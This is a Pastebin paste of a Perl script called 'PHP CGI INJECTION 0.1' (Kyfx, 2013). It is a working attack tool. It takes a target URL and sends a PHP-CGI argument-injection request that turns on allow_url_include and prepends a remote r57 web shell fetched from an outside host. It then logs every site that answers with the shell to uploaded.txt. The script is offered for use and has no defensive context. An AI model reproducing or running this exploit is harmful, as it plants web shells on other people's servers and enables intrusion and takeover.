Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #/!/usr/bin/perl
- ##################################################################
- #
- #
- # By Kyfx - 2013 ©
- # Made in UK
- # GREETZ TO ALL
- # Twitter: @Kyfxsec
- #
- #
- ##################################################################
- use LWP::UserAgent;
- use HTTP::Request;
- use Term::ANSIColor;
- my $ua = LWP::UserAgent->new();
- $ua ->timeout(15);
- print color("green"),
- q{ Thank You
- ====================================================
- # PHP CGI INJECTION 0.1
- # By Kyfx - 2013 ©
- # Made in UK
- # GREETZ TO ALL
- # Kyfxsec -2013
- ====================================================
- Digital url site target
- };
- print " -->> ";
- $site =<STDIN>;
- chomp($site);
- my $lol = "http://".$site if ($site !~ m/http:\/\//);
- my $test .= $lol."/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://r57shell.net/shell/r57.txt%20-n";
- my $request = HTTP::Request -> new (GET => $test);
- my $resposta = $ua -> request ( $request );
- if( $resposta -> content =~ /r57shell/ && $resposta -> content =~ /shell/ )
- {
- open(x,">>uploaded.txt");
- print x "$lol\n";
- close(x);
- print "\n Site vulnerável -- Shell upada\n\n";
- print color("red"), "[+] $test\n\n";
- }
- else {
- print "\n\n O site $lol não está vulnerável. \n\n" ;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement